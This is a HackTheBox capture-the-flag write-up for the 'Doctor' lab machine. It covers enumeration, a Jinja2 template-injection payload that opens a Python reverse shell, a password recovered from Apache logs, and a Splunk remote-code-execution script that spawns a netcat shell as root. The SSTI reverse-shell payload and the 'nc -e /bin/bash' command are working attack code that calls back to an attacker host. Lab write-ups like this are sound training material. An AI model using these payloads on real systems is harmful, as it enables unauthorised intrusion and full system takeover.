[Write Up][Hackthebox] Doctor
Hello, This is my write-up for the “Doctor” machine.
Reconnaissance and Enumeration
As usual, let’s dig for information about this machine. I am gonna using nmap for port scanning.
$ nmap -sV -sC -v -p- --min-rate=10000 -oN nmap.initial 10.10.10.209
I found port 8089 on this machine, but I couldn’t access it. After googling I find this splunkd service has an authenticated remote code execution. Let’s save it for later and try brute-forcing directories at port 80 instead.
$ wfuzz -c -w ~/payloads/big.txt -u "http://10.10.10.209/FUZZ" --hc 404,503 -t 100
Once again, nothing interesting here. And then, I found out about this domain. Let’s add it into /etc/hosts
When I am trying to access http://doctors.htb. We got a different response!
Let’s try registers and find the vulnerabilities. After many testing of SQL Injection, XSS, SSTI, and many more. I am still couldn’t find the vulnerabilities. And then I found out that there’s a comment at source code
And apparently, my payload SSTI is triggered at /archive instead of /home
Gaining Shell as user web
I am just using this payload for gaining a reverse shell.
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('python3 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.38",6667));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")\'')|attr('read')()}}
Gaining Shell as user shaun
After struggling a few hours, where I can find a privilege escalation. I just found out that web user has a group for adm. This group is usually used as a monitoring server. I am just guessing there’s a possibility there’s something at /var/log, and find out there’s a backup log at /var/log/apache2/backup. After doing some little forensic, I found a string password. I am just trying login into shaun user, and it works. We got user flag
Gaining Shell as user root
Remember, at port 8089 have authenticated RCE. Let’s give it a shot using shaun credential.
$ python3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.14.38 --username shaun --password Guitar123 --payload 'nc.traditional -e/bin/bash '10.10.14.38' '6666''We got root flag!
Linkedin : Dimas Fariski Setyawan Putra | LinkedIn
Twitter & Github: @nyxsorcerer
